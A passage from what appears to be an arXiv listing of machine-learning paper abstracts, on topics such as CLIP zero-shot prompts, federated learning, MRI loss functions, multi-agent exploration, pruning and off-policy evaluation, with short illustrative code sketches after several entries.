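    return [round(d * scale) if start <= i < end else d
            for i, d in enumerate(durations)]
```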
    Improving Zero-Shot Generalization for CLIP with Synthesized Prompts. (arXiv:2307.07397v1 [cs.CV])
    With the growing interest in pretrained vision-language models like CLIP, recent research has focused on adapting these models to downstream tasks. Despite achieving promising results, most existing methods require labeled data for all classes, which may not hold in real-world applications due to the long tail and Zipf's law. For example, some classes may lack labeled data entirely, such as emerging concepts. To address this problem, we propose a plug-and-play generative approach called \textbf{S}ynt\textbf{H}es\textbf{I}zed \textbf{P}rompts~(\textbf{SHIP}) to improve existing fine-tuning methods. Specifically, we follow variational autoencoders to introduce a generator that reconstructs the visual features by inputting the synthesized prompts and the corresponding class names to the textual encoder of CLIP. In this manner, we easily obtain the synthesized features for the remaining label-only classes. Thereafter, we fine-tune CLIP with off-the-shelf methods by combining labeled and synthesized features. Extensive experiments on base-to-new generalization, cross-dataset transfer learning, and generalized zero-shot learning demonstrate the superiority of our approach. The code is available at \url{https://github.com/mrflogs/SHIP}.
    Atlas-Based Interpretable Age Prediction. (arXiv:2307.07439v1 [eess.IV])
Age prediction is an important part of medical assessments and research. It can aid in detecting diseases as well as abnormal ageing by highlighting the discrepancy between chronological and biological age. To gain a comprehensive understanding of age-related changes observed in various body parts, we investigate them on a larger scale by using whole-body images. We utilise the Grad-CAM interpretability method to determine the body areas most predictive of a person's age. We expand our analysis beyond individual subjects by employing registration techniques to generate population-wide interpretability maps. Furthermore, we set a new state of the art in whole-body age prediction with a model that achieves a mean absolute error of 2.76 years. Our findings reveal three primary areas of interest: the spine, the autochthonous back muscles, and the cardiac region, which exhibits the highest importance.
    Data Augmentation for Mathematical Objects. (arXiv:2307.06984v1 [cs.SC])
    This paper discusses and evaluates ideas of data balancing and data augmentation in the context of mathematical objects: an important topic for both the symbolic computation and satisfiability checking communities, when they are making use of machine learning techniques to optimise their tools. We consider a dataset of non-linear polynomial problems and the problem of selecting a variable ordering for cylindrical algebraic decomposition to tackle these with. By swapping the variable names in already labelled problems, we generate new problem instances that do not require any further labelling when viewing the selection as a classification problem. We find this augmentation increases the accuracy of ML models by 63% on average. We study what part of this improvement is due to the balancing of the dataset and what is achieved thanks to further increasing the size of the dataset, concluding that both have a very significant effect. We finish the paper by reflecting on how this idea could be applied in other uses of machine learning in mathematics.
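The relabeling-by-permutation idea can be sketched as follows (a simplified illustration with string-encoded polynomials; the actual datasets encode problems differently):

```python
import itertools
import re

def augment(problem, best_var, variables):
    """Generate one labelled instance per permutation of variable names.

    problem:  polynomial problem as a string, e.g. "x1^2*x2 + x3"
    best_var: the variable whose ordering was labelled best
    """
    out = []
    for perm in itertools.permutations(variables):
        mapping = dict(zip(variables, perm))
        # rename every variable occurrence in one pass
        renamed = re.sub("|".join(map(re.escape, variables)),
                         lambda m: mapping[m.group()], problem)
        out.append((renamed, mapping[best_var]))
    return out
```

Because the label (the best variable) is permuted along with the names, every generated instance is correctly labelled for free, which is what lets the dataset grow by a factor of $n!$ without further labelling.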
    Population Expansion for Training Language Models with Private Federated Learning. (arXiv:2307.07477v1 [cs.LG])
Federated learning (FL) combined with differential privacy (DP) offers machine learning (ML) training with distributed devices and a formal privacy guarantee. With a large population of devices, FL with DP produces a performant model in a timely manner. However, for applications with a smaller population, not only does the model utility degrade, as the DP noise is inversely proportional to the population size, but the training latency also increases, since waiting for enough clients to become available from a smaller pool is slower. In this work, we therefore propose expanding the population based on domain adaptation techniques to speed up training and improve the final model quality when training with small populations. We empirically demonstrate that our techniques can improve the utility by 13% to 30% on real-world language modeling datasets.
    Improved Convergence Analysis and SNR Control Strategies for Federated Learning in the Presence of Noise. (arXiv:2307.07406v1 [cs.LG])
We propose an improved convergence analysis technique that characterizes the distributed learning paradigm of federated learning (FL) with imperfect/noisy uplink and downlink communications. Such imperfect communication scenarios arise in the practical deployment of FL in emerging communication systems and protocols. The analysis developed in this paper demonstrates, for the first time, that there is an asymmetry in the detrimental effects of uplink and downlink communications in FL. In particular, the adverse effect of the downlink noise is more severe on the convergence of FL algorithms. Using this insight, we propose improved Signal-to-Noise Ratio (SNR) control strategies that, discarding the negligible higher-order terms, lead to a similar convergence rate for FL as in the case of a perfect, noise-free communication channel, while incurring significantly less power resources compared to existing solutions. In particular, we establish that to maintain the $O(\frac{1}{\sqrt{K}})$ rate of convergence as in the case of noise-free FL, we need to scale down the uplink and downlink noise by $\Omega({\sqrt{k}})$ and $\Omega({k})$ respectively, where $k$ denotes the communication round, $k=1,\dots, K$. Our theoretical result has two major benefits: first, it does not rely on the somewhat unrealistic assumption of bounded client dissimilarity, and second, it only requires smooth non-convex loss functions, a function class better suited for modern machine learning and deep learning models. We also perform extensive empirical analysis to verify the validity of our theoretical findings.
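The round-dependent scaling in the result above translates directly into a power-control schedule; as a sketch (the base noise levels are illustrative assumptions, and any constants hidden in the $\Omega(\cdot)$ terms are dropped):

```python
import math

def noise_schedule(k, uplink_base=1.0, downlink_base=1.0):
    """Effective noise standard deviations at communication round k,
    scaled down by sqrt(k) on the uplink and by k on the downlink,
    following the Omega(sqrt(k)) / Omega(k) requirement."""
    return uplink_base / math.sqrt(k), downlink_base / k
```

The asymmetry, with downlink noise shrinking faster, reflects the paper's finding that downlink noise is the more harmful of the two.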
    Embracing the chaos: analysis and diagnosis of numerical instability in variational flows. (arXiv:2307.06957v1 [stat.ML])
    In this paper, we investigate the impact of numerical instability on the reliability of sampling, density evaluation, and evidence lower bound (ELBO) estimation in variational flows. We first empirically demonstrate that common flows can exhibit a catastrophic accumulation of error: the numerical flow map deviates significantly from the exact map -- which affects sampling -- and the numerical inverse flow map does not accurately recover the initial input -- which affects density and ELBO computations. Surprisingly though, we find that results produced by flows are often accurate enough for applications despite the presence of serious numerical instability. In this work, we treat variational flows as dynamical systems, and leverage shadowing theory to elucidate this behavior via theoretical guarantees on the error of sampling, density evaluation, and ELBO estimation. Finally, we develop and empirically test a diagnostic procedure that can be used to validate results produced by numerically unstable flows in practice.
    Rician likelihood loss for quantitative MRI using self-supervised deep learning. (arXiv:2307.07072v1 [cs.LG])
    Purpose: Previous quantitative MR imaging studies using self-supervised deep learning have reported biased parameter estimates at low SNR. Such systematic errors arise from the choice of Mean Squared Error (MSE) loss function for network training, which is incompatible with Rician-distributed MR magnitude signals. To address this issue, we introduce the negative log Rician likelihood (NLR) loss. Methods: A numerically stable and accurate implementation of the NLR loss was developed to estimate quantitative parameters of the apparent diffusion coefficient (ADC) model and intra-voxel incoherent motion (IVIM) model. Parameter estimation accuracy, precision and overall error were evaluated in terms of bias, variance and root mean squared error and compared against the MSE loss over a range of SNRs (5 - 30). Results: Networks trained with NLR loss show higher estimation accuracy than MSE for the ADC and IVIM diffusion coefficients as SNR decreases, with minimal loss of precision or total error. At high effective SNR (high SNR and small diffusion coefficients), both losses show comparable accuracy and precision for all parameters of both models. Conclusion: The proposed NLR loss is numerically stable and accurate across the full range of tested SNRs and improves parameter estimation accuracy of diffusion coefficients using self-supervised deep learning. We expect the development to benefit quantitative MR imaging techniques broadly, enabling more accurate parameter estimation from noisy data.
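For concreteness, the negative log Rician likelihood for one magnitude measurement follows directly from the Rician density $p(M\mid A,\sigma) = \frac{M}{\sigma^2}\exp\!\left(-\frac{M^2+A^2}{2\sigma^2}\right) I_0\!\left(\frac{MA}{\sigma^2}\right)$; the sketch below is our own stand-alone implementation, not the paper's code, using a series/asymptotic split for $\log I_0$ to stay numerically stable:

```python
import math

def log_i0(x):
    """Numerically stable log of the modified Bessel function I0."""
    if x < 20.0:
        # power series I0(x) = sum_k (x^2/4)^k / (k!)^2
        term, total, k = 1.0, 1.0, 1
        while term > 1e-16 * total:
            term *= (x * x / 4.0) / (k * k)
            total += term
            k += 1
        return math.log(total)
    # asymptotic expansion: I0(x) ~ e^x / sqrt(2 pi x) * (1 + 1/(8x) + ...)
    return x - 0.5 * math.log(2.0 * math.pi * x) + math.log1p(1.0 / (8.0 * x))

def nlr_loss(m, a, sigma):
    """Negative log Rician likelihood of magnitude m given signal a."""
    s2 = sigma * sigma
    return -(math.log(m / s2) - (m * m + a * a) / (2.0 * s2)
             + log_i0(m * a / s2))
```

Minimizing this per-voxel quantity instead of $(m-a)^2$ removes the low-SNR bias that the paper attributes to the MSE loss.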
    Conditionally Optimistic Exploration for Cooperative Deep Multi-Agent Reinforcement Learning. (arXiv:2303.09032v2 [cs.LG] UPDATED)
Efficient exploration is critical in cooperative deep Multi-Agent Reinforcement Learning (MARL). In this work, we propose an exploration method that effectively encourages cooperative exploration based on the idea of a sequential action-computation scheme. The high-level intuition is that to perform optimism-based exploration, agents would explore cooperative strategies if each agent's optimism estimate captures a structured dependency relationship with other agents. Assuming agents compute actions following a sequential order at \textit{each environment timestep}, we provide a perspective to view MARL as tree search iterations by considering agents as nodes at different depths of the search tree. Inspired by the theoretically justified tree search algorithm UCT (Upper Confidence bounds applied to Trees), we develop a method called Conditionally Optimistic Exploration (COE). COE augments each agent's state-action value estimate with an action-conditioned optimistic bonus derived from the visitation count of the global state and joint actions of preceding agents. COE is performed during training and disabled at deployment, making it compatible with any value decomposition method for centralized training with decentralized execution. Experiments across various cooperative MARL benchmarks show that COE outperforms current state-of-the-art exploration methods on hard-exploration tasks.
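The action-conditioned bonus can be pictured as a UCT-style count-based term keyed on the global state plus the actions already chosen by preceding agents; a minimal sketch follows (the exact bonus form used by COE is our assumption here, not taken from the paper):

```python
import math
from collections import defaultdict

class ConditionalBonus:
    """Count-based optimism conditioned on preceding agents' actions."""
    def __init__(self, c=1.0):
        self.c = c
        self.counts = defaultdict(int)
        self.t = 0  # total updates seen

    def bonus(self, state, preceding_actions, action):
        # UCT-style term: larger for rarely tried (state, prefix, action)
        key = (state, tuple(preceding_actions), action)
        n = self.counts[key]
        return self.c * math.sqrt(math.log(self.t + 1) / (n + 1))

    def update(self, state, preceding_actions, action):
        self.counts[(state, tuple(preceding_actions), action)] += 1
        self.t += 1
```

Agent $i$ then acts greedily on its value estimate plus this bonus during training, and the bonus is simply dropped at deployment, matching the train-only exploration described above.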
    Reinforcement Learning with Frontier-Based Exploration via Autonomous Environment. (arXiv:2307.07296v1 [cs.RO])
Active Simultaneous Localisation and Mapping (SLAM) is a critical problem in autonomous robotics, enabling robots to navigate to new regions while building an accurate model of their surroundings. Visual SLAM is a popular technique that uses camera imagery to localise the robot and map the environment. However, existing frontier-based exploration strategies can lead to a non-optimal path in scenarios where there are multiple frontiers at similar distances. This issue can impact the efficiency and accuracy of Visual SLAM, which is crucial for a wide range of robotic applications, such as search and rescue, exploration, and mapping. To address this issue, this research combines an existing Visual-Graph SLAM system known as ExploreORB with reinforcement learning. The proposed algorithm allows the robot to learn and optimize exploration routes through a reward-based system to create an accurate map of the environment with proper frontier selection. Frontier-based exploration is used to detect unexplored areas, while reinforcement learning optimizes the robot's movement by assigning rewards for optimal frontier points. Graph SLAM is then used to integrate the robot's sensory data and build an accurate map of the environment. The proposed algorithm aims to improve the efficiency and accuracy of ExploreORB by optimizing the exploration process of frontiers to build a more accurate map. To evaluate the effectiveness of the proposed approach, experiments will be conducted in various virtual environments using Gazebo, a robot simulation software. Results of these experiments will be compared with existing methods to demonstrate the potential of the proposed approach as an optimal solution for SLAM in autonomous robotics.
    Brain Tumor Detection using Convolutional Neural Networks with Skip Connections. (arXiv:2307.07503v1 [eess.IV])
In this paper, we present different architectures of Convolutional Neural Networks (CNNs) to analyze and classify brain tumors into benign and malignant types using the Magnetic Resonance Imaging (MRI) technique. Different CNN architecture optimization techniques, such as widening and deepening of the network and adding skip connections, are applied to improve the accuracy of the network. Results show that a subset of these techniques can judiciously be used to outperform a baseline CNN model used for the same purpose.
    Certified Robustness for Large Language Models with Self-Denoising. (arXiv:2307.07171v1 [cs.CL])
Although large language models (LLMs) have achieved great success in vast real-world applications, their vulnerability to noisy inputs has significantly limited their use, especially in high-stakes environments. In these contexts, it is crucial to ensure that every prediction made by large language models is stable, i.e., LLM predictions should be consistent given minor differences in the input. This largely falls into the study of certified robust LLMs, i.e., all predictions of the LLM are certified to be correct in a local region around the input. Randomized smoothing has demonstrated great potential in certifying the robustness and prediction stability of LLMs. However, randomized smoothing requires adding noise to the input before model prediction, and its certification performance depends largely on the model's performance on corrupted data. As a result, its direct application to LLMs remains challenging and often results in a small certification radius. To address this issue, we take advantage of the multitasking nature of LLMs and propose to denoise the corrupted inputs with LLMs in a self-denoising manner. Different from previous works like denoised smoothing, which requires training a separate model to robustify the LLM, our method enjoys far better efficiency and flexibility. Our experiment results show that our method outperforms existing certification methods in both certified robustness and empirical robustness. The codes are available at https://github.com/UCSB-NLP-Chang/SelfDenoise.
    MaxMin-L2-SVC-NCH: A New Method to Train Support Vector Classifier with the Selection of Model's Parameters. (arXiv:2307.07343v1 [cs.LG])
The selection of model parameters plays an important role in the application of support vector classification (SVC). The commonly used method for selecting model parameters is k-fold cross validation with grid search (CV). It is extremely time-consuming because it requires training a large number of SVC models. In this paper, a new method is proposed to train SVC while selecting the model parameters. First, training SVC with parameter selection is modeled as a minimax optimization problem (MaxMin-L2-SVC-NCH), in which the minimization problem finds the closest points between two normal convex hulls (L2-SVC-NCH) while the maximization problem finds the optimal model parameters. A lower time complexity can be expected for MaxMin-L2-SVC-NCH because CV is abandoned. A gradient-based algorithm is then proposed to solve MaxMin-L2-SVC-NCH, in which L2-SVC-NCH is solved by a projected gradient algorithm (PGA) while the maximization problem is solved by a gradient ascent algorithm with a dynamic learning rate. To demonstrate the advantages of the PGA in solving L2-SVC-NCH, we compare the PGA with the well-known sequential minimal optimization (SMO) algorithm, after providing an SMO algorithm and some KKT conditions for L2-SVC-NCH. It turns out that the SMO algorithm is a special case of the PGA; the PGA thus provides more flexibility. Comparative experiments between MaxMin-L2-SVC-NCH and classical parameter selection models on public datasets show that MaxMin-L2-SVC-NCH greatly reduces the number of models to be trained without sacrificing test accuracy, indicating that it performs better than the other models. We strongly recommend MaxMin-L2-SVC-NCH as a preferred model for SVC tasks.
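The inner closest-points-between-convex-hulls problem is exactly the kind of simplex-constrained objective a projected gradient algorithm handles: minimize $\|\alpha^\top P - \beta^\top Q\|^2$ over convex-combination weights $\alpha,\beta$. The toy sketch below illustrates that structure only; it is not the paper's implementation and ignores the kernel and regularization details of L2-SVC-NCH:

```python
import numpy as np

def project_simplex(v):
    """Euclidean projection of v onto the probability simplex."""
    u = np.sort(v)[::-1]
    css = np.cumsum(u) - 1.0
    rho = np.nonzero(u - css / np.arange(1, len(u) + 1) > 0)[0][-1]
    theta = css[rho] / (rho + 1.0)
    return np.maximum(v - theta, 0.0)

def closest_hull_points(P, Q, lr=0.1, steps=2000):
    """Projected gradient descent on ||alpha@P - beta@Q||^2 with
    alpha, beta constrained to the simplex (convex-hull weights)."""
    alpha = np.ones(len(P)) / len(P)
    beta = np.ones(len(Q)) / len(Q)
    for _ in range(steps):
        diff = alpha @ P - beta @ Q
        alpha = project_simplex(alpha - lr * 2.0 * P @ diff)
        beta = project_simplex(beta + lr * 2.0 * Q @ diff)
    return alpha @ P, beta @ Q
```

The projection step is what makes the iterates stay valid convex-hull points, which is the role the PGA plays inside MaxMin-L2-SVC-NCH.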
    Impact of Free-carrier Nonlinearities on Silicon Microring-based Reservoir Computing. (arXiv:2307.07011v1 [cs.ET])
    We quantify the impact of thermo-optic and free-carrier effects on time-delay reservoir computing using a silicon microring resonator. We identify pump power and frequency detuning ranges with NMSE less than 0.05 for the NARMA-10 task depending on the time constants of the two considered effects.
    Structured Pruning of Neural Networks for Constraints Learning. (arXiv:2307.07457v1 [cs.LG])
In recent years, the integration of Machine Learning (ML) models with Operation Research (OR) tools has gained popularity across diverse applications, including cancer treatment, algorithmic configuration, and chemical process optimization. In this domain, the combination of ML and OR often relies on representing the ML model output using Mixed Integer Programming (MIP) formulations. Numerous studies in the literature have developed such formulations for many ML predictors, with a particular emphasis on Artificial Neural Networks (ANNs) due to the significant interest they attract in many applications. However, ANNs frequently contain a large number of parameters, resulting in MIP formulations that are impractical to solve, thereby impeding scalability. In fact, the ML community has already introduced several techniques to reduce the parameter count of ANNs without compromising their performance, since the substantial size of modern ANNs presents challenges for ML applications as it significantly impacts computational efforts during training and necessitates significant memory resources for storage. In this paper, we showcase the effectiveness of pruning, one of these techniques, when applied to ANNs prior to their integration into MIPs. By pruning the ANN, we achieve significant improvements in the speed of the solution process. We discuss why pruning is more suitable in this context compared to other ML compression techniques, and we identify the most appropriate pruning strategies. To highlight the potential of this approach, we conduct experiments using feed-forward neural networks with multiple layers to construct adversarial examples. Our results demonstrate that pruning offers remarkable reductions in solution times without hindering the quality of the final decision, enabling the resolution of previously unsolvable instances.
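The payoff of pruning in this setting comes from the MIP encoding: each nonzero weight contributes a term to the layer constraints $\sum_j w_{ij} x_j + b_i$ (and each ReLU a binary variable), so zeroing weights directly shrinks the formulation the solver must reason about. A minimal magnitude-pruning sketch (unstructured, for illustration only; the paper advocates structured strategies):

```python
import numpy as np

def magnitude_prune(weights, sparsity=0.8):
    """Zero out the smallest-magnitude fraction `sparsity` of weights."""
    threshold = np.quantile(np.abs(weights), sparsity)
    return np.where(np.abs(weights) < threshold, 0.0, weights)

# Fewer nonzeros means fewer terms per MIP constraint, hence a smaller
# formulation to hand to the solver.
```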
    MaxCorrMGNN: A Multi-Graph Neural Network Framework for Generalized Multimodal Fusion of Medical Data for Outcome Prediction. (arXiv:2307.07093v1 [cs.LG])
With the emergence of multimodal electronic health records, the evidence for an outcome may be captured across multiple modalities ranging from clinical to imaging and genomic data. Predicting outcomes effectively requires fusion frameworks capable of modeling fine-grained and multi-faceted complex interactions between modality features within and across patients. We develop an innovative fusion approach called MaxCorr MGNN that models non-linear modality correlations within and across patients through Hirschfeld-Gebelein-Renyi maximal correlation (MaxCorr) embeddings, resulting in a multi-layered graph that preserves the identities of the modalities and patients. We then design, for the first time, a generalized multi-layered graph neural network (MGNN) for task-informed reasoning in multi-layered graphs, which learns the parameters defining patient-modality graph connectivity and message passing in an end-to-end fashion. We evaluate our model on an outcome prediction task using a Tuberculosis (TB) dataset, consistently outperforming several state-of-the-art neural, graph-based, and traditional fusion techniques.
    A Scenario-Based Functional Testing Approach to Improving DNN Performance. (arXiv:2307.07083v1 [cs.LG])
This paper proposes a scenario-based functional testing approach for enhancing the performance of machine learning (ML) applications. The proposed method is an iterative process that starts with testing the ML model on various scenarios to identify areas of weakness. It is followed by further testing on the suspected weak scenarios and a statistical evaluation of the model's performance on those scenarios to confirm the diagnosis. Once the diagnosis of weak scenarios is confirmed by test results, the model is treated by retraining it with a transfer learning technique, using the original model as the base and applying a set of training data specifically targeting the treated scenarios plus a subset of training data selected at random from the original training dataset to prevent the so-called catastrophic forgetting effect. Finally, after the treatment, the model is assessed again by testing on the treated scenarios as well as other scenarios to check whether the treatment is effective and causes no side effects. The paper reports a case study with a real ML deep neural network (DNN) model, the perception system of an autonomous racing car. It demonstrates that the method is effective in the sense that the DNN model's performance can be improved. It provides an efficient way of enhancing an ML model's performance with far less human and compute resource than retraining from scratch.
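The retraining-data recipe described above (weak-scenario data plus a random replay subset of the original training set to guard against catastrophic forgetting) can be sketched as follows; the function name and the `replay_frac` value are illustrative assumptions, not values from the paper:

```python
import numpy as np

def build_treatment_set(weak_X, weak_y, orig_X, orig_y,
                        replay_frac=0.2, seed=0):
    """Combine weak-scenario examples with a random replay subset of the
    original training data; the replay subset is what protects the
    retrained model against catastrophic forgetting."""
    rng = np.random.default_rng(seed)
    n_replay = int(replay_frac * len(orig_X))
    idx = rng.choice(len(orig_X), size=n_replay, replace=False)
    X = np.concatenate([weak_X, orig_X[idx]])
    y = np.concatenate([weak_y, orig_y[idx]])
    return X, y
```

Fine-tuning the original model on this mixed set, then re-testing on both treated and untreated scenarios, completes one iteration of the loop the abstract describes.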
    Neuro-symbolic Empowered Denoising Diffusion Probabilistic Models for Real-time Anomaly Detection in Industry 4.0. (arXiv:2307.06975v1 [cs.LG])
Industry 4.0 involves the integration of digital technologies, such as IoT, Big Data, and AI, into manufacturing and industrial processes to increase efficiency and productivity. As these technologies become more interconnected and interdependent, Industry 4.0 systems become more complex, which makes it difficult to identify and stop anomalies that may cause disturbances in the manufacturing process. This paper proposes a diffusion-based model for real-time anomaly prediction in Industry 4.0 processes. Using a neuro-symbolic approach, we integrate industrial ontologies into the model, thereby adding formal knowledge of smart manufacturing. Finally, we propose a simple yet effective way of distilling diffusion models through Random Fourier Features for deployment on an embedded system, allowing direct integration into the manufacturing process. To the best of our knowledge, this approach has never been explored before.
    Choice Models and Permutation Invariance. (arXiv:2307.07090v1 [econ.EM])
    Choice Modeling is at the core of many economics, operations, and marketing problems. In this paper, we propose a fundamental characterization of choice functions that encompasses a wide variety of extant choice models. We demonstrate how nonparametric estimators like neural nets can easily approximate such functionals and overcome the curse of dimensionality that is inherent in the non-parametric estimation of choice functions. We demonstrate through extensive simulations that our proposed functionals can flexibly capture underlying consumer behavior in a completely data-driven fashion and outperform traditional parametric models. As demand settings often exhibit endogenous features, we extend our framework to incorporate estimation under endogenous features. Further, we also describe a formal inference procedure to construct valid confidence intervals on objects of interest like price elasticity. Finally, to assess the practical applicability of our estimator, we utilize a real-world dataset from S. Berry, Levinsohn, and Pakes (1995). Our empirical analysis confirms that the estimator generates realistic and comparable own- and cross-price elasticities that are consistent with the observations reported in the existing literature.  ( 2 min )
    Leveraging Factored Action Spaces for Off-Policy Evaluation. (arXiv:2307.07014v1 [cs.LG])
    Off-policy evaluation (OPE) aims to estimate the benefit of following a counterfactual sequence of actions, given data collected from executed sequences. However, existing OPE estimators often exhibit high bias and high variance in problems involving large, combinatorial action spaces. We investigate how to mitigate this issue using factored action spaces i.e. expressing each action as a combination of independent sub-actions from smaller action spaces. This approach facilitates a finer-grained analysis of how actions differ in their effects. In this work, we propose a new family of "decomposed" importance sampling (IS) estimators based on factored action spaces. Given certain assumptions on the underlying problem structure, we prove that the decomposed IS estimators have less variance than their original non-decomposed versions, while preserving the property of zero bias. Through simulations, we empirically verify our theoretical results, probing the validity of various assumptions. Provided with a technique that can derive the action space factorisation for a given problem, our work shows that OPE can be improved "for free" by utilising this inherent problem structure.  ( 2 min )
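A minimal sketch of the factorization behind the decomposed IS estimators: when a joint action is a combination of independent sub-actions, the joint importance ratio is the product of per-factor ratios. The paper's estimators and their variance guarantees are more refined than this; the sketch only shows the factorized weight computation.

```python
import numpy as np

def decomposed_is_weights(pi_e_factors, pi_b_factors, actions):
    """Importance weights for factored action spaces.

    pi_e_factors / pi_b_factors: one probability vector per sub-action
    dimension, for the evaluation and behavior policies respectively.
    actions: integer array of shape (n_samples, n_dims).
    Under independence across sub-actions, the joint ratio
    pi_e(a)/pi_b(a) equals the product of per-dimension ratios.
    """
    w = np.ones(len(actions))
    for d, (pe, pb) in enumerate(zip(pi_e_factors, pi_b_factors)):
        a_d = actions[:, d]
        w *= pe[a_d] / pb[a_d]
    return w
```

For example, with two binary sub-actions, each sample's weight is the product of its two per-dimension ratios rather than one ratio over the full combinatorial action space.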
    Safe Reinforcement Learning as Wasserstein Variational Inference: Formal Methods for Interpretability. (arXiv:2307.07084v1 [cs.LG])
    Reinforcement Learning or optimal control can provide effective reasoning for sequential decision-making problems with variable dynamics. Such reasoning in practical implementation, however, poses a persistent challenge in interpreting the reward function and corresponding optimal policy. Consequently, formalizing the sequential decision-making problems as inference has a considerable value, as probabilistic inference in principle offers diverse and powerful mathematical tools to infer the stochastic dynamics whilst suggesting a probabilistic interpretation of the reward design and policy convergence. In this study, we propose a novel Adaptive Wasserstein Variational Optimization (AWaVO) to tackle these challenges in sequential decision-making. Our approach utilizes formal methods to provide interpretations of reward design, transparency of training convergence, and probabilistic interpretation of sequential decisions. To demonstrate practicality, we show convergent training with guaranteed global convergence rates not only in simulation but also in real robot tasks, and empirically verify a reasonable tradeoff between high performance and conservative interpretability.  ( 2 min )
    Accelerated gradient methods for nonconvex optimization: Escape trajectories from strict saddle points and convergence to local minima. (arXiv:2307.07030v1 [math.OC])
This paper considers the problem of understanding the behavior of a general class of accelerated gradient methods on smooth nonconvex functions. Motivated by some recent works that have proposed effective algorithms, based on Polyak's heavy ball method and the Nesterov accelerated gradient method, to achieve convergence to a local minimum of nonconvex functions, this work proposes a broad class of Nesterov-type accelerated methods and puts forth a rigorous study of these methods, encompassing the escape from saddle points and convergence to local minima, through both an asymptotic and a non-asymptotic analysis. In the asymptotic regime, this paper answers an open question of whether Nesterov's accelerated gradient method (NAG) with variable momentum parameter avoids strict saddle points almost surely. This work also develops two metrics of asymptotic rate of convergence and divergence, and evaluates these two metrics for several popular standard accelerated methods, such as NAG and Nesterov's accelerated gradient with constant momentum (NCM), near strict saddle points. In the local regime, this work provides an analysis that leads to "linear" exit time estimates from strict saddle neighborhoods for trajectories of these accelerated methods, as well as the necessary conditions for the existence of such trajectories. Finally, this work studies a sub-class of accelerated methods that can converge in convex neighborhoods of nonconvex functions with a near optimal rate to a local minimum and at the same time offers superior saddle-escape behavior compared to that of NAG.
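For reference, the two method families compared above can be written in their standard form, with step size $s$ and momentum parameter $\beta_k$ (variable in NAG, constant in NCM); this is the textbook parameterization, not necessarily the exact one used in the paper:

```latex
% Nesterov-type acceleration: gradient step at the extrapolated point y_k
x_{k+1} = y_k - s\,\nabla f(y_k), \qquad
y_{k+1} = x_{k+1} + \beta_k\,(x_{k+1} - x_k),
% NAG uses a variable momentum, e.g. \beta_k = \frac{k}{k+3};
% NCM uses a constant \beta_k \equiv \beta \in (0,1).
% Polyak's heavy ball instead takes the gradient at x_k itself:
x_{k+1} = x_k - s\,\nabla f(x_k) + \beta\,(x_k - x_{k-1}).
```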
    Short Boolean Formulas as Explanations in Practice. (arXiv:2307.06971v1 [cs.LO])
    We investigate explainability via short Boolean formulas in the data model based on unary relations. As an explanation of length k, we take a Boolean formula of length k that minimizes the error with respect to the target attribute to be explained. We first provide novel quantitative bounds for the expected error in this scenario. We then also demonstrate how the setting works in practice by studying three concrete data sets. In each case, we calculate explanation formulas of different lengths using an encoding in Answer Set Programming. The most accurate formulas we obtain achieve errors similar to other methods on the same data sets. However, due to overfitting, these formulas are not necessarily ideal explanations, so we use cross validation to identify a suitable length for explanations. By limiting to shorter formulas, we obtain explanations that avoid overfitting but are still reasonably accurate and also, importantly, human interpretable.  ( 2 min )
    Layerwise Linear Mode Connectivity. (arXiv:2307.06966v1 [cs.LG])
In the federated setup one performs an aggregation of separate local models multiple times during training in order to obtain a stronger global model; most often, aggregation is a simple averaging of the parameters. Understanding when and why averaging works in a non-convex setup, such as federated deep learning, is an open challenge that hinders obtaining highly performant global models. On i.i.d. datasets, federated deep learning with frequent averaging is successful. The common understanding, however, is that during independent training the models drift away from each other, and thus averaging may no longer work after many local parameter updates. The problem can be seen from the perspective of the loss surface: for points on a non-convex surface the average can become arbitrarily bad. The assumption of local convexity, often used to explain the success of federated averaging, contradicts the empirical evidence showing that high loss barriers exist between models from the very beginning of learning, even when training on the same data. Based on the observation that the learning process evolves differently in different layers, we investigate the barrier between models in a layerwise fashion. Our conjecture is that the barriers preventing successful federated training are caused by a particular layer or group of layers.
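The barrier quantity discussed above is commonly defined as the maximum gap between the loss along the linear path between two models and the linear interpolation of their endpoint losses (a standard definition, assumed here; a layerwise variant would interpolate only one layer's parameters while keeping the rest fixed):

```python
import numpy as np

def linear_barrier(loss_fn, theta_a, theta_b, n_points=11):
    """Loss barrier along the segment between two parameter vectors:
    max over t of L((1-t)*a + t*b) minus the chord (1-t)*L(a) + t*L(b).
    Zero or negative means the models are linearly mode-connected."""
    ts = np.linspace(0.0, 1.0, n_points)
    la, lb = loss_fn(theta_a), loss_fn(theta_b)
    path = [loss_fn((1 - t) * theta_a + t * theta_b) for t in ts]
    chord = [(1 - t) * la + t * lb for t in ts]
    return max(p - c for p, c in zip(path, chord))

# Toy non-convex loss with a bump between two zero-loss "models"
bumpy = lambda th: float(np.sin(3 * th[0]) ** 2)
bumpy_barrier = linear_barrier(bumpy, np.array([0.0]), np.array([np.pi / 3]))
print(bumpy_barrier)  # → 1.0 (loss bump at the midpoint)
```

On a convex loss the barrier is zero, which is exactly the local-convexity intuition the abstract says is contradicted by empirical federated-learning evidence.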
    Implicit regularization in AI meets generalized hardness of approximation in optimization -- Sharp results for diagonal linear networks. (arXiv:2307.07410v1 [cs.LG])
    Understanding the implicit regularization imposed by neural network architectures and gradient based optimization methods is a key challenge in deep learning and AI. In this work we provide sharp results for the implicit regularization imposed by the gradient flow of Diagonal Linear Networks (DLNs) in the over-parameterized regression setting and, potentially surprisingly, link this to the phenomenon of phase transitions in generalized hardness of approximation (GHA). GHA generalizes the phenomenon of hardness of approximation from computer science to, among others, continuous and robust optimization. It is well-known that the $\ell^1$-norm of the gradient flow of DLNs with tiny initialization converges to the objective function of basis pursuit. We improve upon these results by showing that the gradient flow of DLNs with tiny initialization approximates minimizers of the basis pursuit optimization problem (as opposed to just the objective function), and we obtain new and sharp convergence bounds w.r.t.\ the initialization size. Non-sharpness of our results would imply that the GHA phenomenon would not occur for the basis pursuit optimization problem -- which is a contradiction -- thus implying sharpness. Moreover, we characterize $\textit{which}$ $\ell_1$ minimizer of the basis pursuit problem is chosen by the gradient flow whenever the minimizer is not unique. Interestingly, this depends on the depth of the DLN.
    DISPEL: Domain Generalization via Domain-Specific Liberating. (arXiv:2307.07181v1 [cs.CV])
